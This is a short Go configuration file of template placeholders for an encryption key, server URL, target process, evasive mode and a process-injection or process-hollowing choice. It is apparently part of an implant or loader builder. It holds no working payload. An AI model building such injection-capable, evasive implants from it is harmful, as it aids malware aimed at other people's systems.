package config

const (
	EncryptionKey = "{{ENCRYPTION_KEY}}"

	ServerURL     = "{{SERVER_URL}}"
	InjectionType = "{{INJECTION_TYPE}}" // "ProcessInjection" o "ProcessHollowing"
	TargetProcess = "{{TARGET_PROCESS}}"
	EvasiveMode   = {{EVASIVE_MODE}}
)
